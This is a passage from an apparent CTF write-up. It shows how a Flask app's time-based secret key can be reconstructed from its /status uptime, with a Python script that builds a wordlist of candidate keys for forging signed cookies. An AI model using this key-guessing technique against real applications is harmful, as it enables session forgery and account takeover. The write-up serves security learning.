although the cookie can be read but it is signed, if we want to manipulate the cookie we need a secret key which was used in the app to sign the new new cookie
going back to /backup we can see how the app generated the secret key :
c = datetime.now()
f = c.strftime("%Y%m%d%H%M")
app.secret_key = f'THE_REYNOLDS_PAMPHLET-{f}'
and lets also take a look at the /status endpoint :
System healthy! Computing uptime... 82817 days 9 hours 48 minutes
here the hint is that app was started once and it is running without fail
we can roughly calculate the launch time using the following logic :
launch time = current time - uptime
this can easily be done using a python script but we wont get the exact time the key was generated because app launch and key generation will have different timings depending on multiple factors so we need to adjust the launch time a bit to get the exact key generation time
#!/usr/bin/env python3
import requests
from datetime import datetime, timedelta
base_url = 'http://challenge.nahamcon.com'
port = 30311
path = 'status'
url = f'{base_url}:{port}/{path}'
rqst = requests.get(url)
resp = rqst.text.split('\n')[1].split(' ')
days = int(resp[0])
hours = int(resp[2])
mins = int(resp[4])
uptime = timedelta(days=days, hours=hours, minutes=mins)
current_time = datetime.now()
launch_time = current_time - uptime
with open('list.txt', 'w') as outfile:
for i in range(0, 1000):
forward_time = launch_time - timedelta(minutes=i)
format_time = forward_time.strftime("%Y%m%d%H%M")
key = f'THE_REYNOLDS_PAMPHLET-{format_time}'
outfile.write(key + '\n')
